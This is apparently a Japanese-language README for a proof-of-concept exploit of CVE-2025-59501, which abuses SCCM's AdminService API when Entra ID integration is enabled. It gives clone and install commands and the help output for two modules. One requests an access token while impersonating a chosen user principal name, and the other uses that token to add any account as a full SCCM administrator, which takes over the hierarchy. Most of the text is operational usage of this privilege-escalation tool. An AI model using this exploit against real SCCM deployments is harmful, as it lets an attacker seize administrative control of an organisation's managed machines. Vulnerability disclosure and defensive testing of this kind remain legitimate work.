
CVE-2025-59501 POCコード
Entra ID統合が有効なSCCMのAdminService APIを悪用して、フル管理者に昇格しSCCM階層を乗っ取るためのPoCです。詳細はこちらのブログをご覧ください。
git clone https://github.com/garrettfoster13/CVE-2025-59501.git
cd CVE-2025-59501/
uv sync
このツールにはtokenとadminの2つのモジュールがあります。
➜ CVE-2025-59501 git:(main) ✗ uv run poc.py
usage: poc.py [-h] {token,admin} ...
@unsigned_sh0rtによるCVE-2025-59501を悪用するPoC
positional arguments:
{token,admin}
token AdminServiceアクセストークンを取得
admin ユーザーをSCCM管理者として追加
options:
-h, --help このヘルプメッセージを表示して終了
tokenモジュールは、偽装したいUPNを持つEntra/ADユーザーとしてアクセストークンを要求するために使用します。
➜ CVE-2025-59501 git:(main) ✗ uv run poc.py token -h
usage: poc.py token [-h] -u USERNAME [-p PASSWORD] -c CLIENT_ID -t TENANT_ID [-s SCOPE]
options:
-h, --help このヘルプメッセージを表示して終了
-u, --username USERNAME
ユーザー名
-p, --password PASSWORD
パスワード
-c, --client-id CLIENT_ID
AzureアプリのクライアントID
-t, --tenant-id TENANT_ID
EntraテナントID
-s, --scope SCOPE リソースURI/スコープ
adminモジュールは、トークンを使用してAdminService APIに認証し、対象のユーザーアカウントをSCCM管理者として追加します。
➜ CVE-2025-59501 git:(main) ✗ uv run poc.py admin -h
usage: poc.py admin [-h] -t TARGET -u USER -s SID -a ACCESS_TOKEN
options:
-h, --help このヘルプメッセージを表示して終了
-t, --target TARGET 対象のSMSプロバイダのFQDNまたはIPアドレス
-u, --user USER 管理者として追加するユーザー名
-s, --sid SID 新しい管理者ユーザーのSID
-a, --access-token ACCESS_TOKEN
AdminServiceアクセストークン